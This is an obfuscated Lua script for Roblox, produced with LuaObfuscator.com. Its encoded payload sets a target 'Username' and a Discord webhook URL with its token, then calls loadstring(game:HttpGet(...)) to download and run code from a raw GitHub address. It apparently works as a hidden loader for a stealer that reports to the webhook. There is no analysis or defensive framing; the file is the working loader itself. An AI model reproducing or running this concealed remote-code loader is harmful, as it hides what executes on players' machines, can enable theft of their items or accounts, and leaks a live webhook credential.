--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/(2^(v32-((879 -(282 + 595)) -1))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v85-(v85%(620 -(555 + 64))) ;end end else local v86=0;local v87;while true do if (v86==(931 -(857 + 74))) then v87=(570 -(367 + 181 + 20))^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -((417 -191) + (1916 -872)))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 ;v35=958 -(892 + 65) ;end end end local function v23() local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * (138 + 51 + 67)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + ((1007 -(915 + 82)) -6) ;v38=(2 -1) -0 ;end end end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==1) then v46=773 -(158 + 43 + 571) ;v47=(v20(v45,1 -(1055 -(87 + 968)) ,(416 + 791) -(1069 + 118) ) * ((4 -2)^(69 -37))) + v44 ;v43=1 + (4 -3) ;end if (v43==(3 -1)) then v48=v20(v45,21 + 0 ,31);v49=((v20(v45,823 -(368 + 423) )==((7 -4) -2)) and  -(1 + 0)) or 1 ;v43=21 -(10 + 8) ;end if (v43==(885 -(261 + 624))) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(445 -(416 + (58 -32)))) then if (v48==(0 -0)) then if (v47==(1423 -((2471 -1841) + 793))) then return v49 * (0 + 0) ;else v48=3 -2 ;v46=0 -0 ;end elseif (v48==(2485 -(145 + 293))) then return ((v47==(0 + 0)) and (v49 * ((3 -2)/((1843 -(447 + 966)) -(44 + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + 4 + 484)) ) * (v46 + (v47/((1 + 1)^(818 -(745 + 21))))) ;end end end local function v25(v50) local v51=0 -0 ;local v52;local v53;while true do if (v51==(1819 -((6480 -4777) + 114))) then v53={};for v92=702 -(376 + 325) , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=4 -1 ;end if ((8 -5)==v51) then return v6(v53);end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=4 -2 ;end if (v51==(14 -(9 + 5 + 0))) then v52=nil;if  not v50 then v50=v23();if (v50==(376 -(85 + 291))) then return "";end end v51=1266 -(243 + 1022) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if (v68==1) then if (v54~=0) then else local v98=(function() return 0 -0 ;end)();local v99=(function() return;end)();while true do if (v98==0) then v99=(function() return 0;end)();while true do if (v99~=(603 -(268 + 335))) then else v55=(function() return function(v172,v173,v174) local v175=(function() return 290 -(60 + 230) ;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 0;end)();while true do if (v176~=(572 -(426 + 146))) then else local v186=(function() return 0;end)();while true do if (v186==(0 + 0)) then v172[v173-#"." ]=(function() return v174();end)();return v172,v173,v174;end end end end break;end end end;end)();v56=(function() return {};end)();v99=(function() return 1;end)();end if (v99==1) then v57=(function() return {};end)();v58=(function() return {};end)();v99=(function() return 2;end)();end if (v99==2) then v54=(function() return 1457 -(282 + 1174) ;end)();break;end end break;end end end break;end if (v68~=(811 -(569 + 242))) then else if (v54==(5 -3)) then v59[ #"91("]=(function() return v21();end)();for v103= #"/",v23() do local v104=(function() return v21();end)();if (v20(v104, #"|", #"|")==0) then local v135=(function() return 0;end)();local v136=(function() return;end)();local v137=(function() return;end)();local v138=(function() return;end)();while true do if (v135==(0 + 0)) then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (0~=v159) then else v160=(function() return 0;end)();while true do if (v160~=(1024 -(706 + 318))) then else v136=(function() return v20(v104,1253 -(721 + 530) , #"91(");end)();v137=(function() return v20(v104, #"asd1",6);end)();v160=(function() return 1;end)();end if (v160~=1) then else v135=(function() return 1;end)();break;end end break;end end end if (v135~=2) then else if (v20(v137, #":", #"<")~= #"/") then else v138[1273 -(945 + 326) ]=(function() return v61[v138[2]];end)();end if (v20(v137,4 -2 ,2 + 0 )~= #"<") then else v138[ #"nil"]=(function() return v61[v138[ #"nil"]];end)();end v135=(function() return 703 -(271 + 429) ;end)();end if (v135~=(1 + 0)) then else local v161=(function() return 1500 -(1408 + 92) ;end)();while true do if (v161==(1087 -(461 + 625))) then v135=(function() return 1290 -(993 + 295) ;end)();break;end if (v161~=0) then else v138=(function() return {v22(),v22(),nil,nil};end)();if (v136==(1171 -(418 + 753))) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181~=0) then else v182=(function() return 0 + 0 ;end)();while true do if (v182~=0) then else v138[ #"xnx"]=(function() return v22();end)();v138[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v136== #"]") then v138[ #"91("]=(function() return v23();end)();elseif (v136==2) then v138[ #"nil"]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v136== #"asd") then local v191=(function() return 0 + 0 ;end)();local v192=(function() return;end)();while true do if (v191~=0) then else v192=(function() return 0 + 0 ;end)();while true do if (v192~=0) then else v138[ #"19("]=(function() return v23() -((531 -(406 + 123))^(1785 -(1749 + 20))) ;end)();v138[ #"0313"]=(function() return v22();end)();break;end end break;end end end v161=(function() return 1;end)();end end end if (v135==(1 + 2)) then if (v20(v137, #"91(", #"-19")~= #":") then else v138[ #"?id="]=(function() return v61[v138[ #".com"]];end)();end v56[v103]=(function() return v138;end)();break;end end end end for v105= #":",v23() do v57,v105,v28=(function() return v55(v57,v105,v28);end)();end return v59;end if (v54==(1323 -(1249 + 73))) then local v101=(function() return 0;end)();local v102=(function() return;end)();while true do if (v101==(0 + 0)) then v102=(function() return 0;end)();while true do if (v102~=2) then else v54=(function() return 1147 -(466 + 679) ;end)();break;end if (v102~=(2 -1)) then else v61=(function() return {};end)();for v165= #".",v60 do local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();local v168=(function() return;end)();local v169=(function() return;end)();while true do if (v166==(1900 -(106 + 1794))) then local v180=(function() return 0;end)();while true do if ((0 + 0)==v180) then v167=(function() return 0 + 0 ;end)();v168=(function() return nil;end)();v180=(function() return 2 -1 ;end)();end if (v180==1) then v166=(function() return 2 -1 ;end)();break;end end end if (v166~=(115 -(4 + 110))) then else v169=(function() return nil;end)();while true do if (v167==0) then local v184=(function() return 0;end)();while true do if (v184~=0) then else v168=(function() return v21();end)();v169=(function() return nil;end)();v184=(function() return 1;end)();end if (1~=v184) then else v167=(function() return 585 -(57 + 527) ;end)();break;end end end if (1==v167) then if (v168== #".") then v169=(function() return v21()~=0 ;end)();elseif (v168==(1429 -(41 + 1386))) then v169=(function() return v24();end)();elseif (v168~= #"nil") then else v169=(function() return v25();end)();end v61[v165]=(function() return v169;end)();break;end end break;end end end v102=(function() return 2;end)();end if (v102~=0) then else v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v102=(function() return 104 -(17 + 86) ;end)();end end break;end end end v68=(function() return 1 + 0 ;end)();end end end end local function v29(v62,v63,v64) local v65=v62[1 -0 ];local v66=v62[5 -(217 -(22 + 192)) ];local v67=v62[169 -(122 + 44) ];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27;local v73=1 -0 ;local v74= -(337 -(144 + 192));local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v88=0 + 0 ,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 + 0 ];else v79[v88]=v76[v88 + (1 -0) ];end end local v80=(v77-v71) + (66 -(30 + 35)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[1 + 0 ];if ((1482<=1561) and (v82<=(1262 -(1043 + 214)))) then if (v82<=(5 -3)) then if ((820<=4474) and (v82<=(0 -0))) then local v106;local v107,v108;local v109;local v110;v79[v81[1214 -(323 + 889) ]]=v64[v81[3 + 0 ]];v73=v73 + ((685 -(483 + 200)) -1) ;v81=v69[v73];v110=v81[582 -(361 + 219) ];v109=v79[v81[323 -(53 + 267) ]];v79[v110 + 1 + 0 ]=v109;v79[v110]=v109[v81[15 -(1474 -(1404 + 59)) ]];v73=v73 + (414 -(15 + 398)) ;v81=v69[v73];v79[v81[984 -(18 + 964) ]]=v81[(30 -19) -8 ];v73=v73 + 1 + 0 ;v81=v69[v73];v110=v81[2 + 0 ];v107,v108=v72(v79[v110](v13(v79,v110 + 1 + 0 ,v81[(1145 -292) -(20 + (1595 -(468 + 297))) ])));v74=(v108 + v110) -((563 -(334 + 228)) + 0) ;v106=304 -(244 + 60) ;for v139=v110,v74 do local v140=126 -(116 + 10) ;while true do if ((0 + 0)==v140) then v106=v106 + (739 -(542 + 196)) ;v79[v139]=v107[v106];break;end end end v73=v73 + (1 -0) ;v81=v69[v73];v110=v81[1 + 1 ];v79[v110]=v79[v110](v13(v79,v110 + 1 + (0 -0) ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[1 + 1 ]]();v73=v73 + (2 -1) ;v81=v69[v73];v73=v81[3];elseif (v82==(1614 -(1565 + (111 -63)))) then local v144=0 + 0 ;local v145;while true do if ((0 -0)==v144) then v145=v81[269 -(176 + 91) ];v79[v145]=v79[v145](v13(v79,v145 + ((2 -0) -(1 + 0)) ,v74));break;end end else v79[v81[2]]=v81[1554 -(1126 + 425) ];end elseif ((4279>=2882) and (v82<=(1095 -(975 + 117)))) then local v124=v81[407 -(118 + 287) ];local v125,v126=v72(v79[v124](v13(v79,v124 + 1 ,v81[1878 -((393 -(141 + 95)) + 1718) ])));v74=(v126 + v124) -(3 -2) ;local v127=0 + 0 ;for v141=v124,v74 do v127=v127 + (1122 -(118 + 1003)) ;v79[v141]=v125[v127];end elseif ((v82>(13 -9)) or (2029>=3521)) then v79[v81[(5 + 0) -3 ]]();else v64[v81[(978 -598) -((341 -199) + 235) ]]=v79[v81[9 -7 ]];end elseif (v82<=(2 + 6)) then if ((v82<=(983 -(130 + 423 + 424))) or (2037>=4642)) then v64[v81[5 -2 ]]=v79[v81[2 + 0 ]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2 + 0 ]]=v81[7 -4 ];v73=v73 + 1 + 0 ;v81=v69[v73];v64[v81[2 + 1 ]]=v79[v81[2 + 0 ]];v73=v73 + (612 -(602 + (24 -15))) ;v81=v69[v73];v79[v81[4 -2 ]]=v81[7 -4 ];v73=v73 + (2 -(1 + 0)) ;v81=v69[v73];v73=v81[1 + 2 ];elseif ((1720<4458) and (v82==(33 -26))) then do return;end else local v150=v81[(394 + 361) -(239 + 514) ];local v151=v79[v81[(2 -0) + 1 ]];v79[v150 + (1330 -(471 + 326 + 532)) ]=v151;v79[v150]=v151[v81[167 -(92 + 71) ]];end elseif (v82<=(7 + 1 + 1)) then if (v79[v81[2 + 0 ]]==v81[(2 -0) + 2 ]) then v73=v73 + (2 -1) ;else v73=v81[(1970 -(574 + 191)) -(373 + 829) ];end elseif (v82==(741 -(476 + 211 + 44))) then v73=v81[(2838 -1705) -(369 + 761) ];else v79[v81[4 -2 ]]=v64[v81[2 + 1 ]];end v73=v73 + (1 -(0 + 0)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403493Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D4469676974616C7A2F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083Q00557365726E616D65030A3Q002Q53412Q76412Q47453203073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313330363132353330333130313532363130392F634F313832614A50734270436E6F742Q724A7A7163506C5947306B736D4B716143503042746F537076526272696B483245634A5F754A68513136482D6D53565A2Q43525900143Q0012023Q00013Q0026093Q000B0001000200040A3Q000B000100120B000100033Q00122Q000200043Q00202Q00020002000500122Q000400066Q000200046Q00013Q00024Q00010001000100044Q001300010026093Q00010001000100040A3Q00010001001202000100083Q001206000100073Q00122Q0001000A3Q00122Q000100093Q00124Q00023Q00044Q000100012Q00073Q00017Q00",v9(),...);
